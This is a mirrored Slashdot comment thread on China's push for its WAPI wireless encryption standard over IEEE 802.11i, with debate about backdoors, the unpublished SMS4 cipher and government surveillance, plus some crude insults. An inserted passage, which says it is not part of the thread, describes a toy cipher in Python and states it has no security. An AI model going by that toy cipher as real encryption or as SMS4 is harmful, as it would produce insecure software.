Slashdot Mirror


China Frustrated In Encryption Talks

mikesd81 writes "According to an AP article, the Chinese are pushing for the encryption standard called WAPI. It's not going so well, as the majority of countries are taking the IEEE standard 802.11i. From the article: 'An international dispute over a wireless computing standard took a bitter turn this past week with the Chinese delegation walking out of a global meeting to discuss the technology. The delegation's walkout from Wednesday's opening of a two-day meeting in the Czech Republic escalated an already rancorous struggle by China to gain international acceptance for its homegrown encryption technology known as WAPI. It follows Chinese accusations that a U.S.-based standards body used underhanded tactics to prevent global approval of WAPI.'"

252 comments

  1. Maybe I'm too paranoid, but... by damburger · · Score: 5, Interesting

    Isn't it possible the Chinese could be pushing an encryption standard because they know a flaw in it they can exploit?

    --
    If we can put a man on the moon, why can't we shoot people for Apollo-related non-sequiturs?
    1. Re:Maybe I'm too paranoid, but... by prefect42 · · Score: 4, Insightful

      But the US is too lovely and Christian to do the same?

      --

      jh

    2. Re:Maybe I'm too paranoid, but... by ClamIAm · · Score: 0, Troll

      Yeah, like all the backdoors the NSA put into SELinux...

    3. Re:Maybe I'm too paranoid, but... by Tom+Womack · · Score: 5, Insightful

      It is entirely conceivable, made more so by the enormous Chinese reticence to publish the SMS4 encryption algorithm they're using and to open it to international review.

      AES versus a Chinese government-approved algorithm which you can only get a specification for by agreeing to partner with one of eleven Chinese firms is not a difficult decision.

    4. Re:Maybe I'm too paranoid, but... by damburger · · Score: 1, Insightful

      Oh, don't get me wrong - I don't trust the US government not to do the exact same thing. I just trust the CCP even less. Either way, I wouldn't entrust my privacy to any standard pushed by a government, as all governments are in the business of espionage. PS Is a random number generator moderating or something?

      --
      If we can put a man on the moon, why can't we shoot people for Apollo-related non-sequiturs?
    5. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      That sounds serious and, by the way you speak, it seems that there are quite a few. Could you please mention at least one?

    6. Re:Maybe I'm too paranoid, but... by ClamIAm · · Score: 0, Offtopic
    7. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      you should know that sarcasm doesn't pass through forum posts.

    8. Re:Maybe I'm too paranoid, but... by ronanbear · · Score: 5, Insightful
      Too paranoid is sorta an oxymoron on subjects like these.

      In fairness, the Chinese could have a legitimate reason to want their own encryption standard: they own the IP on it. Down the road there could be quite large licensing costs on 802.11n devices. Since this would be an area where the Chinese would have the same cost base (for export) it would have the effect of making Chinese router exporters less competitive relatively speaking. They would both be funding their rivals and any cost savings they could make in manufacturing would make up a smaller proportion of the cost of the device.

      The actual effectiveness (or lack thereof) of the encryption might be as irrelevant as it is in many standards conflicts.

      --
      the more they over-think the plumbing the easier it is to stop up the pipe
    9. Re:Maybe I'm too paranoid, but... by Nested · · Score: 1
      > the Chinese could have a legitimate reason to want their own encryption standard: they own the IP on it.

      Honestly, when have the Chinese ever given a shit about IP?
    10. Re:Maybe I'm too paranoid, but... by DNS-and-BIND · · Score: 5, Interesting
      Uh...licensing costs? They just steal it. It's standard operating procedure. Seriously.

      Just this weekend, I was at the local expo at my city here in China (I'm an expat). I open up their little guide magazine that comes with the gift bag and city map. Inside, I find content ripped off directly from my own website (I run the local English-language city guide). It's stuff that I wrote, and the freaking government copied it. Of course, there was no use complaining - what am I going to do, sue?

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    11. Re:Maybe I'm too paranoid, but... by michael_george · · Score: 0, Flamebait

      >Hey,
      >
      >At least this Christian country, called the USA, which you so obviously despise, doesn't shut Google down for an entire two weeks without explanation.

      Oh, get off your high horse. So obviously a true Christian country wouldn't use 'rendition' to torture information from prisoners either, now would they?

    12. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      I don't know if you remember, but the US recently voted down Net Neutrality. Shutting down Google for a couple of weeks won't be much compared to allowing private companies decide what you can and cannot see...

    13. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      Does the standard use characters useable in the Chinese language?
      ASCII, for example, would be useless.
      For example: an encryption string using an English alphabet could anger them culturally and they see it as 'Not neutral'.
      The Chinese may want to see characters that can render Chinese.

    14. Re:Maybe I'm too paranoid, but... by WiJO · · Score: 4, Insightful

      The Chinese care about IP when it's their IP. They give tacit approval to those who pirate others' intellectual property, but they will not stand for anyone taking theirs.

    15. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      They will probably reject Unicode as well.
      The issue may be that it's simply not their design and nothing more.

    16. Re:Maybe I'm too paranoid, but... by mrchaotica · · Score: 3, Informative

      They have to legitimately pay for licenses on anything they manufacture and import into the US. The grandparent poster's theory is that they want to give their router manufacturers a competitive advantage, because otherwise they have to pay the same license fee as everyone else and can't undercut the competition as much.

      --

      "[Regarding the 'cloud,'] ownership was what made America different than Russia." -- Woz

    17. Re:Maybe I'm too paranoid, but... by iariar · · Score: 1

      Maybe China just wants to regain some credibility in science / technology matters by having their standard adopted. http://www.seedmagazine.com/news/2006/05/scientific_copy_cats.php

    18. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 4, Informative

      It's got nothing to do with the US being better than China - the Chinese delegation is trying to portray it as a national issue, but actually it's about open standards. 802.11i is a published, peer-reviewed standard based on published, peer-reviewed encryption algorithms. In fact the driving force behind 802.11i is the flaws that were found in 802.11b by people outside the IEEE. If 802.11b had been a closed-book standard like WAPI, those flaws would still have existed but they might never have been made public.

    19. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      Then, make your own encryption algorithm. Let's see whether it can stand some hacking.

    20. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 1, Insightful

      And I guess that's the problem with you and the rest of the ignorant Americans. You think you know how other countries should be run, but you can't even run your own.

      Enjoy the police state.

    21. Re:Maybe I'm too paranoid, but... by Kadin2048 · · Score: 2, Insightful

      Don't be naive: just because the Chinese don't play by the rules domestically says nothing about whether they will expect other people to play by them with regards to their IP.

      I fully expect that if their product was made the standard, and some Western nation started ripping it off without paying the licensing fees, the PRC would throw a full-on diplomatic/economic hissy fit. In exchange for royalties, they would agree to consider, in principle, someday, perhaps soon, to appoint a minister to draft a paper on the creation of a committee to enforce and respect other nations' IP within the Chinese domestic market. Or they'd make some noises and arrest some (preferably Western) person for making bootleg DVDs, and then forget about it until the next time trade negotiations roll around.

      That's how they do business. Seems to be working for them, though.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    22. Re:Maybe I'm too paranoid, but... by wrook · · Score: 2, Interesting

      I just want to point out:

      It's not stealing, it's infringing.

      And it may not even be infringing because China is not a member of the Berne convention. They do not have copyright in the way that western countries do. I'm not overly familiar with Chinese laws, so I don't know if what they do is illegal. But I suspect not.

      As an expat in a foreign country, you should be aware that there are foreign laws.

    23. Re:Maybe I'm too paranoid, but... by Pink+Tinkletini · · Score: 1

      It can, but apparently everyone on Slashdot is autistic. Who knew?

    24. Re:Maybe I'm too paranoid, but... by Fordiman · · Score: 2, Insightful

      My GOD, but you sound like Jeffry Rowland's 'the Englishman'. I'm having difficulty taking you seriously.

      I think this particular sentiment is hilarious in its nature. We have a population and land mass at least as big as any European country - per state. Yes. Our country has problems. It comes from having to manage a LOT more country than yours does. So yeah, you provincial fuck, shove it up your ass.

      As for thinking how other countries should be run - well, not so much. We suggest capitalist democracy, as that tends to place control, at least in the early stages, in the hands of the citizenry. No, I don't exactly trust a communist government. I'll deal with a socialist government; at least the government's just redistributing resources at that point, but I'm not a fan of 'the government owns everything'. Absolute power and all.

      Can't run our own? Been doing it for over 200 years, and despite our issues, are still the number one economic force in the world. I'm not saying we're doing a spectacular job, but honestly, being the best country in the world is like being the valedictorian of summer school.

      Police state? Yeah. You're clever. No, seriously, what police state? The one in which we have standards formed by the IEEE? 'cos last I checked, the 'I' stood for 'International'. Not that the wireless standard we use is in any way related to our police statiness.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    25. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      He's aware.. he has no problem selling Chinese crap on his website.

    26. Re:Maybe I'm too paranoid, but... by /ASCII · · Score: 1

      While I am worried about net neutrality, your description of a future with no net neutrality is rather unrealistic.

      If an internet provider would try to blacklist, or even seriously downgrade the bandwidth to any of the popular sites on the internet not willing to pay for the extra bandwidth, then that provider will lose a _lot_ of customers.

      --
      Try out fish, the friendly interactive shell.
    27. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 2, Funny

      Put some misteaks in your website just to embarass them.

    28. Re:Maybe I'm too paranoid, but... by liak12345 · · Score: 0

      You people have more paranoid delusions than Stephen King on crack.

    29. Re:Maybe I'm too paranoid, but... by Fordiman · · Score: 1

      *blink*

      You obviously don't understand encryption.

      It's just numbers. 0-255 or 0-65535, it doesn't matter. You convert a block of data to a VERY long number, run the encryption algorithm on it, and convert it into a transport-friendly charset (like base 64 for email, or binary for TCP/IP). The password is the same - whatever charset it's in, it just gets converted to a number. Now, slap on top the fact that your comment is MEANINGLESS when applied to what should be a transparent network layer, and I fail to see why you should be allowed to multiply.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    30. Re:Maybe I'm too paranoid, but... by Threni · · Score: 2, Funny

      > Too paranoid is sorta an oxymoron on subjects like these.

      Uh..it's not, unless you can somehow demonstrate that "too" and "paranoid" are in some way contradictory.

    31. Re:Maybe I'm too paranoid, but... by utnapistim · · Score: 0

      It's the same story that happened when DES algorithm appeared:

      They created a set of values to be used for the S and P values and when they submitted it to the NSA, they got back the S and P values completely changed.

      It couldn't be proved that the new values were unsafe to use and both the creators and the NSA argued they'd rather use their values because the other party could have known some weak point in the values they offered.

      I think it's the same, all over again.

      --
      Tie two birds together: although they have four wings, they cannot fly. (The blind man)
    32. Re:Maybe I'm too paranoid, but... by longbow486 · · Score: 1

      That's exactly why the Chinese are trying to get it approved, so that they can get into everyone's information, when they all think it is secure, yet it's not. fucking Chinese, think before you try and get a standard approved that is known to have a flaw in it

    33. Re:Maybe I'm too paranoid, but... by newt0311 · · Score: 0

      Jeez, from my perspective, the parent is right. Encryptions are algorithms which transform a set of numbers without losing data. To do this, they use mathematical relationships. If you give everybody a binary algorithm and all it does is add one, that is clearly a vulnerability. The back door in the algorithms the Chinese proposed is not going to be simple but it may very well be there. I am not saying that WAPI has a back door but the anonymous coward has made a valid point here which deserves consideration. Now your reproductive ability. With that lack of knowledge and arrogance I doubt you would ever manage get anybody of the opposite sex to reproduce with you.

    34. Re:Maybe I'm too paranoid, but... by WhiteWolf666 · · Score: 3, Insightful

      You can't license WAPI.

      WAPI is only available for Chinese manufacturers.

      In trying to make WAPI the international standard for Wireless Encryption, China is trying to position itself as the de facto manufacturer for all wireless devices, software and/or hardware.

      This is not going to work.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    35. Re:Maybe I'm too paranoid, but... by WhiteWolf666 · · Score: 3, Informative

      Actually, the I stands for "Institute", as in Institute of Electrical and Electronics Engineers, Inc.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    36. Re:Maybe I'm too paranoid, but... by tutori · · Score: 1

      Correct me if I'm wrong, but I remember reading somewhere that it was found that the NSA's values were better against certain attacks unknown to the 'public' at the time of DES' creation. Of course, this doesn't mean that you can now trust the NSA completely, only that they dealt truthfully about this in the past.

    37. Re:Maybe I'm too paranoid, but... by Sexy+Commando · · Score: 1

      Maybe you should check out GB18030

    38. Re:Maybe I'm too paranoid, but... by Urusai · · Score: 1

      Unpublished encryption algorithms aren't.

    39. Re:Maybe I'm too paranoid, but... by Schraegstrichpunkt · · Score: 1

      Yes, it's possible, but it isn't necessary. The bottom line is that China is basically saying, "It's secure, trust us", which is an argument that was dismissed by the security community decades ago.

    40. Re:Maybe I'm too paranoid, but... by 1u3hr · · Score: 2, Informative
      > As for thinking how other countries should be run - well, not so much. We suggest capitalist democracy

      You've got a century of installing and propping up dictators to live down. Recall Pinochet? Diem? Marcos? The Shah? Against that you've got Japan and Germany, but it's a mixed bag.

    41. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      Uhh... we were kind of busy fighting the commies at that point in time. Hence the propping up of dictators. Maybe wasn't the best solution but to our point of view a dictator that answered to us was far better than the commies taking over a country.

    42. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      Why on earth is this comment about the "lovely US" score:4 insightful? It demonstrates no process of analysis on the part of the poster. 3rd graders can compare and contrast major political powers better than this. How about score:1 Laziness.

    43. Re:Maybe I'm too paranoid, but... by Nykon · · Score: 1

      You hit it right on the nose. Mod his comment up people! :)

      --
      "It's better to be a pirate then join the Navy"
    44. Re:Maybe I'm too paranoid, but... by layer3switch · · Score: 1

      Look, there is no "I" in Team or International or Institute... oh wait... it sounded clever 5 minutes ago... Oh, I hate karma...

      --
      "Don't let fools fool you. They are the clever ones."
    45. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      Go back before the US publishing industry started, and America did exactly the same thing.
      IP is only important when _you_ have something to lose.

    46. Re:Maybe I'm too paranoid, but... by Fordiman · · Score: 1

      "Jeez, from my perspective, the parent is right. Encryptions are algorithms which transform a set of numbers without losing data. To do this, they use mathematical relationships. If you give everybody a binary algorithm and all it does is add one, that is clearly a vulnerability. The back door in the algorithms the Chinese proposed is not going to be simple but it may very well be there."

      You make very good and valid points - none of which are applicable to GP's comment. He was talking about language, which has nothing to do with security. In other words, my comment boils down to: 'no the Chinese weren't complaining about everything being in English; the language doesn't come into that layer of encryption.'

      "With that lack of knowledge and arrogance I doubt you would ever manage get anybody of the opposite sex to reproduce with you."

      My 'lack of knowledge' was at least enough to read what you were attempting to defend.

      (Now, this is slashdot, so no remorse on the bad grammar; tut, tut)

      As for my lack of arrogance, I thank you. ...

      Oh, you meant it the other way. Ok. Ahem. Plenty of stupid humans with balls the size of melons reproduce. It's very likely the way you came about.

      Yeah. There's very good justification for my sig. Especially when I'm in a bad mood.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    47. Re:Maybe I'm too paranoid, but... by Fordiman · · Score: 1

      Sorry, read the sig. Not giving a damn.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    48. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      How does "number one economic force in the world" turn into "being the best country in the world"? The two have nothing to do with each other as far as I'm concerned. The US has one of the lowest standards of living among the industrialized world, and has some of the lowest quality of life measurements.

    49. Re:Maybe I'm too paranoid, but... by DNS-and-BIND · · Score: 1
      Actually, they introduced some mistakes of their own. No kidding.

      It all turned out well, though. I talked to a government official who actually speaks English, and he sympathized with my plight. He invited me for dinner on Friday! (being invited to dinner with a Communist government official is a huge deal in China)

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    50. Re:Maybe I'm too paranoid, but... by Anonymous Coward · · Score: 0

      someone is going to suddenly go missing.

  2. It boils down to... by QuietLagoon · · Score: 4, Interesting
    ...who can crack whose encryption.

    The Chinese want their encryption to be the standard so that they can use their backdoor.

    The US wants its encryption to be the standard so they can use their backdoor.

    1. Re:It boils down to... by DirtyHarry · · Score: 1

      Well, then I'd opt for a European Encryption.

      --
      Always run = ON
    2. Re:It boils down to... by lurvdrum · · Score: 2, Funny

      In which case all one has to do to be secure is to encrypt using the Chinese standard, then re-encrypt using the US standard. I can't see the Chinese and the US sharing their backdoors!

    3. Re:It boils down to... by damburger · · Score: 2, Insightful

      On what basis are European governments more trustworthy in this regard than the Chinese or US governments?

      It is never a good idea to trust technology supplied to you by people with a vested interest in spying on you.

      --
      If we can put a man on the moon, why can't we shoot people for Apollo-related non-sequiturs?
    4. Re:It boils down to... by klmth · · Score: 4, Informative

      The algorithm selected for AES was originally called Rijndael, and was developed by two Belgian cryptographers.

    5. Re:It boils down to... by Anonymous Coward · · Score: 1, Funny

      > On what basis are European governments more trustworthy in this regard than the Chinese or US governments?

      On basically every basis.

    6. Re:It boils down to... by ynohoo · · Score: 4, Insightful

      The level of independence of the member states helps. Since they don't trust each other, they are more likely to come up with an acceptable standard. While there are reasonable levels of co-operation between their respective security services, there is no top level organisation comparable with the NSA or the Chinese equivalent.

    7. Re:It boils down to... by damburger · · Score: 1

      It may seem like the EU member states get on like cats in a sack, but that only tends to go so far as cultural and economic competition. Violating the privacy of European citizens is in the collective interests of every EU government.

      This might be getting into tinfoil hat territory, but given that it is possible to encrypt your sensitive data before sending it over a network in most cases, would you really want to take a chance?

      --
      If we can put a man on the moon, why can't we shoot people for Apollo-related non-sequiturs?
    8. Re:It boils down to... by Anonymous Coward · · Score: 0
      > The US wants its encryption to be the standard so they can use their backdoor.

      The I in IEEE stands for International. 802.11i is an internationally ratified standard and China is pushing its own unpublished "standard". The chance of there being a deliberate back door in 802.11i is about as high as the chance of that the head of the MPAA will issue a personal apology to the Pirate Bay admins and buy them new servers.

    9. Re:It boils down to... by hengist · · Score: 4, Informative
      > The I in IEEE stands for International.

      It stands for Institute.

    10. Re:It boils down to... by powerlord · · Score: 1
      > While there are reasonable levels of co-operation between their respective security services, there is no top level organisation comparable with the NSA or the Chinese equivalent.

      That's only what they want you to think. ;)
      --
      This space for rent. All reasonable inquiries will be entertained at proprietors discretion.
    11. Re:It boils down to... by QuietLagoon · · Score: 1

      I would have mod'd my message as funny.

    12. Re:It boils down to... by KDR_11k · · Score: 1

      Because the courts of the EU wouldn't like a single exploit as that'd be fostering monopolies so they'd force everyone to ship the product without exploits and ask the user to get his preferred exploit from a variety of competing vendors.

      --
      Justice is the sheep getting arrested while an impartial judge declares the vote void.
    13. Re:It boils down to... by /ASCII · · Score: 1

      The proper solution is to use a multipass encryption. First encrypt using the Chinese standard, then re-encrypt using the American one, the Belgian one, the Iranian one, etc. That way, you'd need to know a backdoor to every encryption scheme used to access the data. Only a minuscule number of quintuple-agents would know all the backdoors, and they can't use this knowledge out of fear of compromising themselves.

      --
      Try out fish, the friendly interactive shell.
    14. Re:It boils down to... by Anonymous Coward · · Score: 0

      But you can't spell Internetionel without IEEE. Er..

    15. Re:It boils down to... by kabocox · · Score: 1

      Um, so include both, that way the Chinese and US governments would have to agree before using both sets of backdoors to get into that info. For minor privacy issues, that should be "good enough". The few things that I could envision the US and Chinese governments agreeing on something, I'd really, really hope that they actually have a backdoor to use though. What's it really matter to slashdot anyway? Don't we use our own set of encryption on top of the built-in encryption? That just makes sense.

    16. Re:It boils down to... by Schraegstrichpunkt · · Score: 1
      > The proper solution is to use a multipass encryption.

      While that might work, there is no guarantee that you'd actually increase your security by doing so.

    17. Re:It boils down to... by Anonymous Coward · · Score: 0

      They probably had it confused with the ITU, where I'm reasonably sure the I stands for international.

      That said, IEEE is pretty international, last I recall. Of course, I was only a member of it for a little while before I changed majors *shrug*

  3. No current implementation? by LinuxGeek · · Score: 5, Insightful
    From Wikipedia:
    The WAPI standard requires the use of a symmetric encryption algorithm[1], SMS4, which was declassified in January 2006. The standard and its cryptographic implementation remain unpublished.


    So the Chinese are pushing for a standard that no one can currently verify as being secure and then they get angry?
    --

    Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
    1. Re:No current implementation? by RareButSeriousSideEf · · Score: 2, Insightful

      ...and, uh, symmetric?

      For quite a few applications, that's enough to deep six SMS4 right there.

      Presuming an area full of sniffers, is there much doubt as to the safer choice between published asymmetric and unpublished symmetric?

      It's nice that people worry so much about them getting into a snit & walking out of a meeting. I mean, it's not like anyone could just go ahead & make decisions without their input, could they?

    2. Re:No current implementation? by execute85 · · Score: 2, Informative

      AES is symmetric too (as was DES before it). Although asymmetric is "stronger", it is very slow. So usually you use asymmetric encryption to negotiate a symmetric key for the communication session. This is what SSL does and it's considered secure (in 128 bit symmetric mode).

    3. Re:No current implementation? by Abcd1234 · · Score: 2, Insightful

      Indeed. And I would argue with the idea that asymmetric ciphers are inherently "stronger". In the end, the strength is in the algorithm used combined with the key size chosen. The two models exist because they fill different roles, not because one is inherently better than the other.

    4. Re:No current implementation? by Schraegstrichpunkt · · Score: 1

      Not only that, but encrypting with raw RSA is considered to be very insecure, mainly because of RSA's commutative property.

  4. wireless encryption by 56ker · · Score: 2, Insightful

    There are already at least two wireless encryption formats I can think of. I don't see why adding a third is a problem. As China's economy is very much export-driven I can see how they'd be frustrated if the US attempted to thwart them getting their standard adopted as an international one.

    1. Re:wireless encryption by LinuxGeek · · Score: 4, Insightful

      See my message above yours. The Standard has not been published after being declassified in January 2006. No published code or theory of operation is available to you, me or 6 billion other people to verify that it is secure or that the spec may be secure but the reference source code may have serious bugs that affect the security. Maybe now you can "...see why adding a third is a problem..." and China knows very well why the standard is being rejected by other intelligent nations right now. It doesn't mean that it can't be a standard in the future, just not right now.

      China also seems to be in love with the idea of the central server verifying the security between the client and AP. Centralized key serving scares me even when the implementation is known to be secure. The key servers in China will be controlled by whom?

      --

      Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
    2. Re:wireless encryption by 56ker · · Score: 1

      Yes but I would've thought that from the Chinese perspective the above makes it easier to protect what they probably view as a trade secret. I can understand them being unwilling to accept a standard that isn't properly defined.

      China likes control in a lot of areas - take their censoring of the internet as a example. However the centralized server hopefully would rule out any "piggy in the middle" attacks where an attacker pretends to be the AP in an attempt to fool the client.

    3. Re:wireless encryption by mrchaotica · · Score: 1

      Are you kidding, or just stupid? The "centralized server" would be a built-in "piggy in the middle!" That's not just unacceptable, it's absurdly so!

      --

      "[Regarding the 'cloud,'] ownership was what made America different than Russia." -- Woz

    4. Re:wireless encryption by 56ker · · Score: 1

      OK, I'll reword what I wrote in an attempt to explain it better. Without the centralized server an attacker can spoof the access point in order to fool a client. If a key from a centralized server is also required it requires an attacker to both spoof the access point and to get the key from the centralized server (hopefully a more difficult task). Yes the centralized server leads to security concerns (eg the keys from it could be used to decrypt the encrypted traffic). However AFAIK the centralised server would be run by some trusted company (say in a similar way to the SSL certificates being signed) which would require law enforcement to follow a process (eg search warrant) before handing any keys over.

      The only downside would be if the traffic was only encrypted with the key from the centralised server. If a combination of the centralized server's key and the access point's key was used it would make it more secure than the current system is (depending on the encryption scheme used).

    5. Re:wireless encryption by mrchaotica · · Score: 1

      The only secure means of key exchange is outside the system, e.g. in person. I'd prefer typing the key (or passphrase) in manually instead of using a centralized server any day!

      --

      "[Regarding the 'cloud,'] ownership was what made America different than Russia." -- Woz

    6. Re:wireless encryption by Anonymous Coward · · Score: 0

      The Standard has not been published

      This paper is linked from the Wikipedia SMS4 talk page. I have no idea what it says (besides SMS4 in the title).

    7. Re:wireless encryption by ralmin · · Score: 1

      The paper you linked to (http://www.oscca.gov.cn/UpFile/200621016423197990.pdf) describes a cryptographic algorithm called SMS4, and includes several lookup tables. It's not a reference implementation but there are some examples given. I don't have time to attempt a full translation now, but perhaps someone else can help out.

      The title is "The SMS4 encryption algorithm used by wireless local area network products"

      The introductory paragraph says "This algorithm is a block algorithm. The algorithm's block length is 128 bits, and the key length is 128 bits. The encryption algorithm and the key expansion algorithm both use a 32-turn non-linear iterative structure. The structure of the decryption algorithm and the encryption algorithm are similar, just the order of use of the turn keys is opposite; the decryption turn key is the reverse order of the encryption turn key."

      (Chinese is not my native language; I probably got some technical terms wrong. Especially "turn key", I don't know what that is!)

      Simon.

    8. Re:wireless encryption by Alsee · · Score: 1

      I don't know any Chinese, but I have a passing familiarity with English Crypto-terminology.

      I am pretty confident that each instance of "turn" should be translated as "round". The encryption is done in 32 rounds using a different key for each round. Decryption is the same as encryption, except that you use the round keys in reverse order.

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
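
The property described in the two comments above (one routine for both directions, with the round keys applied in reverse order for decryption) can be seen in a toy cipher with the same dimensions: 128-bit block, 128-bit key, 32 rounds. This is an added example, not part of the thread and not SMS4: the four-word feedback layout, the `toy_mix` round function and the key schedule are constructed stand-ins chosen only to show the structure, and they provide no security.

```python
import struct

MASK32 = 0xFFFFFFFF
ROUNDS = 32        # "32-round non-linear iterative structure"
BLOCK_BYTES = 16   # 128-bit block
KEY_BYTES = 16     # 128-bit key


def rotl32(value, bits):
    """Rotate a 32-bit word left by `bits`."""
    return ((value << bits) | (value >> (32 - bits))) & MASK32


def toy_mix(word):
    """Constructed stand-in for the real non-linear round function.

    It is never inverted: in this kind of structure decryption re-computes
    the same value and XORs it away, so the function need not be invertible.
    """
    word = (word * 0x9E3779B1 + 0x7F4A7C15) & MASK32
    return word ^ rotl32(word, 7) ^ rotl32(word, 19)


def expand_key(key):
    """Derive 32 round keys from a 128-bit key (toy schedule, same loop shape)."""
    if len(key) != KEY_BYTES:
        raise ValueError("key must be 16 bytes")
    k = list(struct.unpack(">4I", key))
    round_keys = []
    for i in range(ROUNDS):
        constant = (0x01000193 * (i + 1)) & MASK32  # constructed per-round constant
        new_word = k[0] ^ toy_mix(k[1] ^ k[2] ^ k[3] ^ constant)
        k = k[1:] + [new_word]
        round_keys.append(new_word)
    return round_keys


def run_rounds(block, round_keys):
    """Apply the round keys in the order given; used for both directions."""
    if len(block) != BLOCK_BYTES:
        raise ValueError("block must be 16 bytes")
    x = list(struct.unpack(">4I", block))
    for rk in round_keys:
        # Only the oldest word is changed; the other three shift along.
        new_word = x[0] ^ toy_mix(x[1] ^ x[2] ^ x[3] ^ rk)
        x = [x[1], x[2], x[3], new_word]
    # Reversing the word order at the end is what lets the same loop undo
    # itself when it is fed the round keys backwards.
    return struct.pack(">4I", *reversed(x))


def encrypt_block(block, key):
    return run_rounds(block, expand_key(key))


def decrypt_block(block, key):
    # Same routine, round keys in reverse order.
    return run_rounds(block, expand_key(key)[::-1])


if __name__ == "__main__":
    key = bytes(range(16))             # constructed sample key
    plaintext = b"WAPI test block!"    # constructed 16-byte sample block
    ciphertext = encrypt_block(plaintext, key)
    print("ciphertext:", ciphertext.hex())
    print("round trip ok:", decrypt_block(ciphertext, key) == plaintext)
    # Forward key order applied twice does not recover the plaintext.
    print("forward order twice:", encrypt_block(ciphertext, key) == plaintext)
```

Because each round only XORs a recomputable value into one word, a hardware or firmware implementation needs a single datapath for both directions; what an outside reviewer still cannot assess without the full specification is the strength of the real round function and key expansion.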
  5. censorship by kdougherty · · Score: 4, Interesting

    I'm not trying to be negative, especially towards China... However, I would never accept a security concept from any government that filters and censors their country's internet. Seems like an oxymoron to me.

    --
    The best way to predict the future is to invent it. -Alan Kay
    1. Re:censorship by Silver+Sloth · · Score: 2, Insightful

      How about one which monitors its citizens' telephone calls, or insists that its ISPs hand over surfing details? I don't trust the Chinese either, but they're not the only villains on this stage.

      --
      init 11 - for when you need that edge.
    2. Re:censorship by LinuxGeek · · Score: 1

      Exactly! A government that doesn't trust its own people wants the world to trust it to make secure encryption with no published standards and trust that there are no back doors or flaws. And then to trust them to run the Chinese central key servers securely too. If there are serious flaws that they want to take advantage of, then it would seem logical that they would want to make WAPI mandatory (in China at least) too.

      That is asking for a lot of trust from the rest of the world.

      --

      Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
    3. Re:censorship by swb · · Score: 2, Interesting

      I don't trust the Chinese either, but they're not the only villains on this stage.

      That's kind of like saying because I've played catch with a baseball, I should be judged among the NY Yankees.

      Even if you add up all the villainy of the U.S. government over the last 55 years -- COINTELPRO, MKULTRA, NSA eavesdropping, and virtually everything the Bush administration has proposed, it still doesn't come close to the Chinese level of villainy.

      Even if Tiananmen Square was the only oppressive, murderous thing the Chinese have ever done -- and it isn't -- they would still be in a category of oppression and dictatorship that has only Stalinist Russia and Nazi Germany as peers.

      The thing that frustrates me the most about the Bush Administration's "War on Freedom" isn't so much the invasion of privacy or the possible usurpation of the constitution (although they are infuriating), it's the global and internal notion that we now have achieved some kind of oppression parity with the Chinese. When I hear this, I know it's just ignorance talking, but it still drives me mad that a level of snooping that's not even in the same league as everyday corporate data mining or desktop spyware suddenly has people believing the U.S. government steals pages from Mao's playbook.

    4. Re:censorship by Spliffster · · Score: 1
      However, I would never accept a security concept from any government that filters and censors their country's internet. Seems like an oxymoron to me.
      How about one which still has death penalties?
    5. Re:censorship by Kadin2048 · · Score: 1

      Thank you and well said.

      I think that, particularly here on Slashdot, but also among people of a certain demographic and political orientation in general, we risk sometimes losing sight of the forest for all the trees. That is to say, we're so aware of and infuriated by the relatively minor invasions of our privacy by our government here in the U.S., that we fail to put it in perspective and see that there are many places on this planet where the level of government interference in a private citizen's life is far, far worse -- and that this level of interference isn't even seen as problematic: it's just taken for granted as a fact of life.

      People need to back off on the Daily Kos rhetoric from time to time and realize that the NSA is not (yet) running a Great Firewall, Gitmo is not a re-education center that you can get sent to for dissing the wrong Senator in your blog, and that the Bush administration -- regardless of how bad you may think they are -- does not massacre Democrats in the street, or run them over with tanks.

      That is not to say that we should be complacent, or ignore the things that are going on in this country, but when having a discussion about oppression overseas, some perspective is necessary. I can only imagine that to people actually living under repressive governments, that the discussions and rhetoric from the U.S. about things like phone company call logs seem pretty ridiculous.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    6. Re:censorship by KDR_11k · · Score: 1

      Well, I'm glad the IEEE isn't a government, then.

      --
      Justice is the sheep getting arrested while an impartial judge declares the vote void.
    7. Re:censorship by Fordiman · · Score: 1

      Dunno. You've been accepting it for years.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    8. Re:censorship by bmajik · · Score: 1

      I was thinking of posting something like this. Something like "I am sure the Chinese spec has monitoring backdoors in it known only to the Chinese govt". I'd say this because I'd be implying that whatever the US is in favor of wouldn't have such drawbacks.

      Except I don't think it's reasonable to think or say such a thing in light of recent events in the US, which is a shame.

      --
      My opinions are my own, and do not necessarily represent those of my employer.
  6. If China Does Not Like It. . . by Apple+Acolyte · · Score: 1

    . . . then China does not have to accept the standard for its domestic routers, right? What's the big deal?

    --
    Part of the hardcore faithful who believed in Apple long before it was cool again to do so
